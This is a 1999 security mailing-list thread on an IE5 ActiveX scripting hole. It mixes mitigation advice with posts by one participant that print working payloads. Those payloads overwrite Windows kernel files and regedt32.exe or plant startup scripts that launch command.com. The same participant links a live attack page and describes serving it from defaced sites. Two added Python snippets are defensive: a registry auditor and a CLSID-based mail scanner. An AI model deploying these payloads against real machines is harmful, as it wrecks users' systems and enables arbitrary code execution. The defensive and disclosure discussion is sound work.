Re: IE5 allows executing programs

1999-09-09 Thread David LeBlanc

A couple of people have sent me mail asking how to set Outlook 2000 such
that mail comes in under the 'Restricted Sites' zone.  Here's how:

select Tools menu, Options item
select security tab

The area you want is in the middle of the page in the section marked
'Secure Content'.  Default setting is 'Internet', which isn't too bad, but
'Restricted Sites' is better.  One good reason for this is that most people
don't have any sites in 'Restricted Sites' list, so anything you set in
that zone won't screw up your normal web browsing.  Another good reason is
that the default security settings are better for this zone.  Even with the
'High Security' settings, I like to go in and tweak the following:

Script ActiveX Controls Marked Safe for Scripting - ActiveX seems to be
disabled in other places, but go ahead and set this to prompt or disable
just in case there is some exception I'm not aware of.

Microsoft VM Java Permissions - the sandbox is set to high, but given that
every Java VM out there has had a breach or another, and you don't know
when the next will show up, I disable this.  Who needs dancing bunnies in
their e-mail anyway?

Scripting, Active Scripting - I set this to disable.

I haven't noticed any legitimate e-mail breaking, so I think these changes
can be made without impacting anything you or your users might want.
Please test this on your own before doing this to lots of machines.  YMMV.
The above is what I personally do, and may or may not reflect the views of
my employer or anyone else.

I'm reasonably sure that these settings disallow all of the e-mail attacks
(attachments notwithstanding) that I'm aware of, so this should help make
your system more secure against not only known attacks, but whole classes
of undiscovered issues.

I'm not sure what the variants of Outlook allow in this respect - I think
the same thing was in Outlook 97, but I don't have it installed so I can't
go check.  Not sure about Outlook Express, and I don't know how Eudora 4.x
works with this, either.


David LeBlanc
[EMAIL PROTECTED]
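
An added example, not part of the post above or of any Microsoft tooling: a small auditor that reads a registry export of the Restricted Sites zone and reports the three settings the post tweaks when they are weaker than what it describes. It assumes IE's registry layout (zone 4 is Restricted Sites; value names 1405, 1C00 and 1400 hold the three settings); the function names, host names and sample exports are constructed for illustration.

```python
import re

# Registry location of the per-zone settings; zone 4 is Restricted Sites.
ZONES_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
RESTRICTED_SITES = "4"

# URL-action value name -> (setting as labelled in the dialog, acceptable DWORDs).
# For 1400/1405: 0 = enable, 1 = prompt, 3 = disable.
# For 1C00 (Java permissions): 0 = Java disabled, 0x00010000 = high safety.
WANTED = {
    "1405": ("Script ActiveX controls marked safe for scripting", {1, 3}),
    "1C00": ("Java permissions", {0}),
    "1400": ("Active scripting", {3}),
}

_SECTION = re.compile(r"^\[(.+)\]$")
_DWORD = re.compile(r'^"([0-9A-Fa-f]{4})"=dword:([0-9A-Fa-f]{8})$')


def parse_reg(text):
    """Return {key_path: {value_name: int}} for the DWORD values in a .reg export.

    The caller decodes the file first (regedit may write UTF-16)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        section = _SECTION.match(line)
        if section:
            current = keys.setdefault(section.group(1), {})
            continue
        value = _DWORD.match(line)
        if value and current is not None:
            current[value.group(1).upper()] = int(value.group(2), 16)
    return keys


def audit_zone(reg_text, zone=RESTRICTED_SITES):
    """Return [(value_name, label, state)] for settings weaker than WANTED."""
    suffix = (ZONES_KEY + "\\" + zone).lower()
    zone_values = {}
    for path, values in parse_reg(reg_text).items():
        if path.lower().endswith(suffix):
            zone_values = values
    findings = []
    for name, (label, acceptable) in WANTED.items():
        current = zone_values.get(name)
        if current is None:
            findings.append((name, label, "not set"))
        elif current not in acceptable:
            findings.append((name, label, "0x%08X" % current))
    return findings


def audit_hosts(exports):
    """Map host name -> findings, keeping only hosts that have findings."""
    results = {host: audit_zone(text) for host, text in exports.items()}
    return {host: found for host, found in results.items() if found}


# Constructed sample exports (not taken from a real machine).
WEAK = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1400"=dword:00000001
"1405"=dword:00000000
"1C00"=dword:00010000
"""

HARDENED = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1400"=dword:00000003
"1405"=dword:00000001
"1C00"=dword:00000000
"""

if __name__ == "__main__":
    report = audit_hosts({"ws-01": WEAK, "ws-02": HARDENED})
    for host, findings in report.items():
        for name, label, state in findings:
            print("%s: %s (%s) is %s" % (host, label, name, state))
```
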



Re: IE5 allows executing programs

1999-09-09 Thread Kragen Sitaker

David LeBlanc writes:
> YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE.  Period.  End of story.
> What you do with that code is up to you.  There is no need to delve into
> the details of just how you steal the lunch money from the end users.

Well, it should be noted that there are things you can do with that
code that are a lot worse than deleting all of somebody's files.
Password theft, credit-card theft, wholesale identity theft,
distributed computation (need to crack a DES message in a day?),
embezzling money if they use CheckFree, blackmail, and corporate
espionage come to mind.

This sort of thing will happen, sooner or later, on a wide scale --
unless we can do something about it soon.

> > The other
> > thing is that the default install for NT (especially on HP's) is FAT,
>
> Wrong.  That could be how that manufacturer sets up _some_ of their
> machines, but it isn't default for NT install.

Micron and Intergraph also install NT on FAT when they ship it to you.
Micron hassles you if you switch to NTFS and then call them for
support; they wanted my co-worker to reinstall NT on FAT and then call
them back if he was still having trouble.  The NT install program gives
you the option of FAT or NTFS; I don't remember which it picks by default.

If I recall correctly (I've only installed NT five or six times), if
you later convert to NTFS (without reinstalling), you carry over the
FAT permissions: "Full Control" for "All Users" on everything.

> Most people who don't know what NTFS is are still using it if they are
> running NT.

Are there manufacturers that ship NT with NTFS by default?

--
[EMAIL PROTECTED]   Kragen Sitaker http://www.pobox.com/~kragen/
Tue Aug 24 1999
76 days until the Internet stock bubble bursts on Monday, 1999-11-08.
URL:http://www.pobox.com/~kragen/bubble.html



Re: IE5 allows executing programs

1999-09-09 Thread Jesper M. Johansson

> > > The other
> > > thing is that the default install for NT (especially on HP's) is FAT,
> >
> > Wrong.  That could be how that manufacturer sets up _some_ of their
> > machines, but it isn't default for NT install.
>
> Micron and Intergraph also install NT on FAT when they ship it to you.

I can't think of many manufacturers that don't, and the majority of them
don't like it if you convert it. Gateway, for example, refuses completely to
support any aspect of NT running on NTFS on their systems. They even went so
far as to try to void the warranty on one system we bought from them because
it was running NTFS.

The problem with this area, and what makes so many systems vulnerable, is
that OEMs refuse to ship their systems with NTFS partitions. They won't do
it because it is too difficult for them to walk someone through a repair if
they can't get to the boot partition with a dos disk. Since most people
don't know the difference between NTFS and FAT (or a hole in the ground for
that matter) most partitions never get converted, leaving these systems open
to holes like this one. This is a big problem. Hopefully, the ER boot option
in Win2K will solve some of this, since it enables OEMs to easily walk
people through repairs.

> If I recall correctly (I've only installed NT five or six times), if
> you later convert to NTFS (without reinstalling), you carry over the
> FAT permissions: "Full Control" for "All Users" on everything.

FIXACLS.EXE (NTResKit Supplement 2) will fix that. See Q157963 for more
details.

> > Most people who don't know what NTFS is are still using it if they are
> > running NT.
>
> Are there manufacturers that ship NT with NTFS by default?

Only on servers AFAIK. Dell ships its workstations with a menu item for
"converting C to NTFS," which is just a shortcut to convert. That's the best
I've seen so far.


Jesper M. Johansson
[EMAIL PROTECTED]
Editor, SANS NT Digest
MCSE , MCP + I



Re: IE5 allows executing programs

1999-09-09 Thread SysAdmin

Okay,

I added a link to http://www.sassproductions.com/hacked.htm that allows
you to test the exploit against a specific file. Specifically you need to
copy Reg Edit to the program files folder and give it a whirl. As always, if
you can't figure it out then View Source.




Over and out,
Seth Georgion



Re: IE5 allows executing programs

1999-09-09 Thread J MacCraw

Does this writing to an EXE bypass Anti-Virus protection against programs
that write to EXE's?

How about a less damaging example that writes to say "C:\temp\example.exe"
so we can see what it does safely?


At 21:16 8/30/1999 -0400, SysAdmin Wrote:
snip

> ANY Windows 98 file can be overwritten. Period. If you try manually
> pasting over or destroying the file you will be denied, however Active X can
> help where you can't. In fact, ironically, after it's been corrupted you
> cannot fix it because you are denied from touching it! If Windows 98 is
> restarted or crashed (hint, forced to crash), then it will fail start up
> with a Fatal Exception, you can only recover from DOS by restoring the file.
> I would like to note, for the record, that the vast majority of home users
> who will never know about the patch to this file or know what Active X even
> is are not in possession of 98 install disks. Rather they are in possession
> of a disk that restores the computer to factory original. Despite David
> LeBlanc et al. assurance that we could just disable Active X I'm discussing
> it because you know your poor parents are NEVER going to, how would they
> understand the instructions? And, of course, what average user could EVER
> recover from this sort of damage?

snip

> The link is http://www.sassproductions.com/hacked.htm

snip
Joshua MacCraw
http://www.warpmedia.net
mailto:[EMAIL PROTECTED]



Re: IE5 allows executing programs

1999-09-09 Thread Paul L Schmehl

Outlook Express 5 allows setting the Security Zones in the exact same way:
Tools/Options/Security.  So does Outlook 98.

I don't think previous versions allowed it.

--On 9/7/1999, 11:23 AM -0700 David LeBlanc [EMAIL PROTECTED] wrote:

> I'm not sure what the variants of Outlook allow in this respect - I think
> the same thing was in Outlook 97, but I don't have it installed so I can't
> go check.  Not sure about Outlook Express, and I don't know how Eudora 4.x
> works with this, either.

Paul L. Schmehl, [EMAIL PROTECTED]
Technical Support Services Manager
The University of Texas at Dallas



Re: IE5 allows executing programs

1999-09-07 Thread Brad Griffin

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Hi all.
I recently posted extracts from George Guninski's original post about
this issue and an extract from Sysadmin's post (both with the code
samples) in an e-mail to another list to inform some of 'the masses'.
I received a personal e-mail from one of the people on that list
describing the following:

" I use Eudora Pro and have IE 5 as the default mail viewer (as is the
default Install) and you crashed Eudora (NT not logged in as
Administrator). I had to disable IE 5 as the default viewer to see the
mail..."
I assume this would have been caused by the mail reader attempting to
execute all four fragments of code.


Date sent:  Wed, 1 Sep 1999 09:59:45 -0700
Send reply to:  David LeBlanc [EMAIL PROTECTED]
From:   David LeBlanc [EMAIL PROTECTED]
Subject:            Re: IE5 allows executing programs
Originally to:  SysAdmin [EMAIL PROTECTED], 
[EMAIL PROTECTED]
To: [EMAIL PROTECTED]

> Now for the detailed response...
>
> At 09:16 PM 8/30/99 -0400, SysAdmin wrote:
>
> > ANY Windows 98 file can be overwritten.

*snip*
> YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE.  Period.  End of story.
> What you do with that code is up to you.  There is no need to delve into
> the details of just how you steal the lunch money from the end users.
*even biggersnip*

-BEGIN PGP SIGNATURE-
Version: PGP 6.5.1 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBN86VbgiK90dv14WBEQJ1ggCeOsY1DUXNIwKMaVgTOxHnMYSlg5gAoL1z
Bns0JeGvBg6AOy5x3HkOIoO0
=IOcI
-END PGP SIGNATURE-
Brad Griffin
2nd yr B.Infotech
CQU Rockhampton
Australia
(Translation: Does not require sleep)

http://www.cai.com/antivirus/personal/
FREE anti-virus software
http://www.avp.com
Not free, but about the best around
*



Re: IE5 allows executing programs

1999-09-02 Thread Jim Frost

> Onto Windows NT, yes, David was correct, you can bar write access in NTFS
> and it cannot be written to. I have not invested any interest in this but I
> assume there is at least one critical system file (possibly security file)
> that he would miss and might be overwritten.

It's actually quite trivial to lock down an NT box against non-administrator
system changes.  The server variant can (or could -- I haven't installed it in
awhile) optionally be set up that way out of the box -- but only if you chose
the options right during installation.  No application installers that I'm
aware of have similar options, however, so you must manually secure anything
you add.

I wrote a simple tool that would tighten security on an NT system a few years
ago as part of a foray into the NT security API -- it was not difficult at all.
In fact, it was interesting to find out which files the system didn't like to
have read-only: back in NT 3.5 the MS-DOS ROM file was written by CMD.EXE when
it shut down!  Very odd.  I think they fixed that in NT4.

> In fact the default for the
> Administrator or one with Administrator privileges is Full Access.

Yes.  It never ceases to amaze me that Microsoft sets it up this way by
default -- as well as not having any kind of tool in-the-box for tightening up
security.  It's a royal pain to do it manually.  Perhaps even worse they appear
to have no best-practices for secure application installations so even if they
put this stuff in there it will be years before vendors start doing the right
thing.

> The other thing to remember is that in
> very small domains the average user is generally administrator

Even in domains of tens of machines (in my experience).  NT is hugely
problematic in that an awful lot of stuff can't be done unless you're an
administrator -- and for sites that don't have enough administrator coverage
(which seems to be most of them) it's common to just make everyone an
administrator so they can perform typical system administration tasks
themselves.

> The other
> thing is that the default install for NT (especially on HP's) is FAT, which
> does not allow specific file security.

True, but conversion is just one command and a reboot away.

So: I'll heartily agree with you that it's not hard to write an exploit that
subverts your typical NT system, but we've seen very few to date (only one that
I remember, but I haven't paid that much attention of late since I no longer
use NT for anything critical) that can do so if you take a few simple
precautions in setting up your system.

jim



Re: IE5 allows executing programs

1999-09-02 Thread David LeBlanc

Now for the detailed response...

At 09:16 PM 8/30/99 -0400, SysAdmin wrote:

> ANY Windows 98 file can be overwritten.

Sure - the OS has no concept whatsoever of securing itself from the end
user. DoSing Win98 with an attack like this is trivial.  However, it is
still a cheap, lame attack on end-users that really doesn't gain you
anything and gives people a bad day.  Maybe that's your idea of fun, but it
isn't mine.  May as well send them an executable that fdisks the hard
drive.  Probably work nearly as often, and do a lot more damage.  Put
dancing bunnies in the .exe.  People love dancing bunnies.

> I would like to note, for the record, that the vast majority of home users

For the record, this hole is a serious one.  I don't downplay the
seriousness of the issue.  I can make it do a lot more than you're thinking
about here, and a number of the obstacles you mention can be overcome
trivially.

YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE.  Period.  End of story.
What you do with that code is up to you.  There is no need to delve into
the details of just how you steal the lunch money from the end users.

> Despite David
> LeBlanc et al. assurance that we could just disable Active X I'm discussing
> it because you know your poor parents are NEVER going to,

Since this is a security list, people here care about security.  One of the
things we do here is discuss work-arounds.  Most UNIX admins don't install
patches either.  Most _people_ don't install patches.  I've broken into
systems that had holes that were 10 years old.  Maybe some of the people
will read this, and say "Damn, he's right", then go click on several
buttons and poof - they aren't vulnerable any more.  Then if some
sociopathic moron DOES go off and create an e-mail virus with this as the
payload, maybe just maybe SOMEONE won't be hit by it.  I try to offer
helpful suggestions as to how to make things BETTER, given that between the
fact that security holes happen, end users are usually clueless, and
sysadmins aren't much better, most networks are a mess.  The ONLY chance
you've got against this sort of thing are automated tools to check LOTS of
systems at once so that you know where the problems are.  I deal with a
network that approaches 100,000 systems, so I know something about scale.

No, most people won't go turn it off.  They'll accept the defaults,
whatever they are.  Somewhat more of them will read about this in the news
and go get the patch.

> And, of course, what average user could EVER
> recover from this sort of damage?

They'll go get a friend who will help them reinstall, or go pay CompUSA or
something.  They might not ever figure out what got them.  Too bad you
can't get them to take a snapshot using their web cam and send it to you so
that you can see the misery on their face.

> Onto Windows NT, yes, David was correct, you can bar write access in NTFS
> and it cannot be written to. I have not invested any interest in this but I
> assume there is at least one critical system file (possibly security file)
> that he would miss and might be overwritten.

Maybe you should.  If you're not running as admin, there isn't much you can
torch off, and certainly not the SAM file.

> In fact the default for the
> Administrator or one with Administrator privileges is Full Access. Of course
> this would allow the exploit to run. The other thing to remember is that in
> very small domains the average user is generally administrator

This is true.  Far too many people run as admin.  Fortunately, this should
get better in Win2k - several changes to encourage people to run as 
admin, and make life easier if you want to change user context to go do
something.

> and remember
> this exploit can be E-Mailed!!! or mass-mailed! get my drift?

I understand that.  E-mail readers that display HTML aren't a really great
idea in my personal opinion, and I'm not using one right now.  However, I
would encourage people to set their mail reader to assume that e-mail is a
hostile site, and make the settings accordingly.  Again, just a vain hope
that maybe a few people might be more secure.  IF someone takes my
suggestion and tweaks their settings, there are whole classes of attacks
that will no longer get them.

And if you do mass mail something like that, you'll cost people a LOT of
money, and the feds will make a good effort to hunt you down and put you in
jail.  Jail is not a fun place.

> The other
> thing is that the default install for NT (especially on HP's) is FAT,

Wrong.  That could be how that manufacturer sets up _some_ of their
machines, but it isn't default for NT install.

> which
> does not allow specific file security. Anyone know a dual-booter? Maybe
> someone who doesn't even know what NTFS is? I thought so.

Most people who don't know what NTFS is are still using it if they are
running NT.

> Not bad 'huh?

Actually, it contains flaws which are trivially overcome that make it break
under a number of conditions.  Though considering what this code does, not
working could be 

Re: IE5 allows executing programs

1999-09-01 Thread David LeBlanc

At 04:24 PM 8/29/99 -0400, SysAdmin wrote:

> Now watch as I modify this to destroy Regedit 32

That's only if the user has write permissions to regedt32.  In terms of
causing the OS to crash, NT won't let you overwrite system binaries that it
is using at the moment.  Something else smart to do (at least under win2k)
is to use RunAs to run your browser under a lower privileged user than normal.

snip really scary horror story - too bad Godzilla isn't in it

> Has anyone figured out if an arbitrary binary could be executed?

George made that pretty clear.  I'll leave the details as an exercise to
the reader.  Safest thing to do is get the patch and set your system to
prompt you when something wants to script one of your ActiveX controls.
The problem here isn't so much ActiveX (which is really just equivalent to
a plug-in), but the fact that it can be scripted, and that the control
itself is responsible for announcing whether it is safe for scripting.

> Also, I understand outlook executes this code immediately, is
> it possible that this same code could cause someone's system to crash merely
> by opening the E-Mail?

This depends on how you have Outlook set up.  Outlook 2000 allows you to
set your e-mail viewing zone to anything you like.  Mine is set to
Untrusted Zone, which has nearly everything set to either off or prompt.
BTW, even default Untrusted Zone isn't untrusted enough for me, so a review
of what the actual settings are is probably in order.  I also like to set
all sorts of stuff to 'prompt' so that it doesn't ignore potential attacks.
 Then I can take whatever action seems appropriate toward the site that is
doing rude things 8-)

Maybe it is just me, but DoS-ing end-users really seems about on par with
beating up elementary school kids for their lunch money.


David LeBlanc
[EMAIL PROTECTED]
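
An added example, not part of any post in this thread: a mail-gateway style check that treats an HTML message body as hostile content and flags references to the two control CLSIDs that appear in the code posted to this thread, whether they sit in a real object tag or inside a script string. The verdict names, function names and sample bodies are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSIDs quoted in the code posted to this thread, keyed to the ids used there.
WATCHED = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC": "'scr' (Path/Doc/write control)",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "'wsh' (control with a Run method)",
}

_CLSID = re.compile(
    r"clsid:\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.IGNORECASE
)


class _Scanner(HTMLParser):
    """Collect object classids and count script blocks in an HTML body."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.script_count = 0
        self.found = []  # (CLSID, where it was seen)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.script_count += 1
        elif tag == "object":
            classid = (dict(attrs).get("classid") or "").strip()
            match = _CLSID.match(classid)
            if match:
                self.found.append((match.group(1).upper(), "object tag"))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Markup inside a script element is not parsed as tags, so a control
        # named only in a string (written out later by the script) is missed
        # by handle_starttag. Search the script text itself.
        if self.in_script:
            for match in _CLSID.finditer(data):
                self.found.append((match.group(1).upper(), "script string"))


def scan_html(body):
    """Return a verdict dict: block on a watched CLSID, review on any other
    embedded control or script, pass otherwise."""
    scanner = _Scanner()
    scanner.feed(body)
    scanner.close()
    watched = sorted({clsid for clsid, _ in scanner.found if clsid in WATCHED})
    if watched:
        verdict = "block"
    elif scanner.found or scanner.script_count:
        verdict = "review"
    else:
        verdict = "pass"
    return {
        "verdict": verdict,
        "watched": watched,
        "found": scanner.found,
        "scripts": scanner.script_count,
    }


# Constructed sample bodies (no methods are called on any control).
PLAIN = "<html><body><p>Meeting moved to 3pm.</p></body></html>"
OBJECT_TAG = ('<p><object id="x" width="14" height="14" '
              'classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object></p>')
SCRIPT_STRING = """<script>var d = "<object
 classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>";</script>"""
OTHER_CONTROL = ('<object classid="clsid:00000000-0000-0000-0000-000000000001">'
                 "</object>")

if __name__ == "__main__":
    for name in ("PLAIN", "OBJECT_TAG", "SCRIPT_STRING", "OTHER_CONTROL"):
        print(name, scan_html(globals()[name])["verdict"])
```
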



Re: IE5 allows executing programs

1999-09-01 Thread SysAdmin

After further research into David LeBlanc's debunking of my posting I have
discovered (rather remembered) that ntoskrnl is loaded from the system
folder into memory where it is accessed exclusively, this frees it from the
write restriction due to system use. I think he must administrate Windows 98
domains which do not let you modify the Kernel (called Krnl386.exe) I'm
sorry I have taken so long to respond to the criticism but I felt that I,
unlike others, should do my research first. Let me summarize the current
understanding

ANY Windows 98 file can be overwritten. Period. If you try manually
pasting over or destroying the file you will be denied, however Active X can
help where you can't. In fact, ironically, after it's been corrupted you
cannot fix it because you are denied from touching it! If Windows 98 is
restarted or crashed (hint, forced to crash), then it will fail start up
with a Fatal Exception, you can only recover from DOS by restoring the file.
I would like to note, for the record, that the vast majority of home users
who will never know about the patch to this file or know what Active X even
is are not in possession of 98 install disks. Rather they are in possession
of a disk that restores the computer to factory original. Despite David
LeBlanc et al. assurance that we could just disable Active X I'm discussing
it because you know your poor parents are NEVER going to, how would they
understand the instructions? And, of course, what average user could EVER
recover from this sort of damage?

Onto Windows NT, yes, David was correct, you can bar write access in NTFS
and it cannot be written to. I have not invested any interest in this but I
assume there is at least one critical system file (possibly security file)
that he would miss and might be overwritten. In fact the default for the
Administrator or one with Administrator privileges is Full Access. Of course
this would allow the exploit to run. The other thing to remember is that in
very small domains the average user is generally administrator and remember
this exploit can be E-Mailed!!! or mass-mailed! get my drift? The other
thing is that the default install for NT (especially on HP's) is FAT, which
does not allow specific file security. Anyone know a dual-booter? Maybe
someone who doesn't even know what NTFS is? I thought so.

Well, I must admit I'm tired of the downplaying and guessing. I have
decided to put the ball in play. I have posted a web page, on my domain mind
you, that contains the Hacks for both OS's. Understand that if you visit
them the hack will run and when it runs, if you're not prepared, you will be
very unhappy. I have included the code here so that you can see what
happens.


The link is http://www.sassproductions.com/hacked.htm

The code for the 98 exploit is

 p
object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
/objectscript
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script

/p

See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.

html

head
titleSelf Destruct /title
/head

body
form method="POST"

table
tr
td width="20%"input type="text" name="State" size=""
maxlength="" value=""/td
/tr
/table

/form
/body
/html

Recognize that? It's the code to DoS IE5. Most simple users would restart at
this point, never notice a web page change, and lose their Kernel.

Here's the NT code

p
object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14"
/object
script
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script
/p

Not bad 'huh? This exploit needs to be realized for what it is, a very
dangerous problem. If someone mass-mailed it to my domain I wouldn't be able
to deal with bouncing between three offices helping EVERY single user.

If someone has a problem with my post feel free to mention it.

Seth Georgion



Re: IE5 allows executing programs

1999-08-30 Thread SysAdmin

Okay, I haven't seen any interesting observations yet as to the value of
this exploit or the potential damage it contains. This exploit allows for
the OVERWRITING of any application you choose, WITHOUT the system objecting.
I haven't tested it against anything specific yet, except for a trial run
against Regedit. The key is to select a specific path in which a known file
resides, such as C:\\winnt\system32 and then you give the .hta file the name
of the file you want overwritten. Here's the code originally included;


object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"

/object
SCRIPT
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/SCRIPT
/object

If you wanted this to run against an NT machine then,

object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/objectscript
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\All Users\\Start
Menu\\Programs\\Startup\\guninski.hta";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script


For all those arguing about figuring out which user it should be addressed
to, the answer is to "All Users"

Now watch as I modify this to destroy Regedit 32


object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/objectscript
scr.Reset();
scr.Path="C:\\WINNT\\System32\\regedt32.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script


As you can see the simple malicious damage is unprecedented, good luck
trying to figure out what's happened when your computers crashed,
permanently. Now let me give you a simple scenario for a real-world example.
Let's say a Cracker, we'll call him Ahab, decides to take over ABC or
Symantec's web page, not that difficult to imagine. Without ever breaking
the firewall, all he has to do is modify the web page. Now usually they
detect the obscene message within minutes taking it offline, imagine though
if Ahab just modified the source, he could include in it both Active X
exploits, for NT and 98, in addition he could add to the source an
instruction to change to another web page in 5 seconds, a page he's added to
InetPub. This new page would include the even more recent exploit that
crashes IE5 with a form field overflow. Imagine how long it would take for
anyone to realize that the web page had been hacked, their computers would
freeze every time they went there for no apparent reason (the new exploit
doesn't display the page that froze your browser only the page before) All
of those home users, the thousands of hits a day they'd be getting, would
simply connect to the site, get their system Kernel overwritten and have
their browser crashed, forcing a restart for the home user. Does everyone
see the potential damage here?

Has anyone figured out if an arbitrary binary could be executed? Such as Net
Cat or BO2K? Also, I understand outlook executes this code immediately, is
it possible that this same code could cause someone's system to crash merely
by opening the E-Mail?

Seth Georgion